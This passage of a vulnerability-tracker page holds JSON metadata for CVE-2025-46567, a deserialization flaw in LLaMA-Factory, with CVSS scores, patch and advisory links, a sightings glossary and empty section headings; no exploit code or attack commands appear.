          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "LOW",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:L",
          "version": "3.1"
        },
        "exploitabilityScore": 1.3,
        "impactScore": 4.7,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "LOCAL",
          "availabilityImpact": "HIGH",
          "baseScore": 7.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 1.8,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2025-05-01T18:15:58.117",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/hiyouga/LLaMA-Factory/commit/2989d39239d2f46e584c1e1180ba46b9768afb2a"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/hiyouga/LLaMA-Factory/security/advisories/GHSA-f2f7-gj54-6vpv"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/hiyouga/LLaMA-Factory/security/advisories/GHSA-f2f7-gj54-6vpv"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-502"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2025-46567 (GCVE-0-2025-46567)

GHSA-F2F7-GJ54-6VPV

Description

Attack Vector

Impact

Proof of Concept (PoC)

Affected File(s)

Suggested Fix

Workarounds

References

Credits

FKIE_CVE-2025-46567

Tags

Sightings

Nomenclature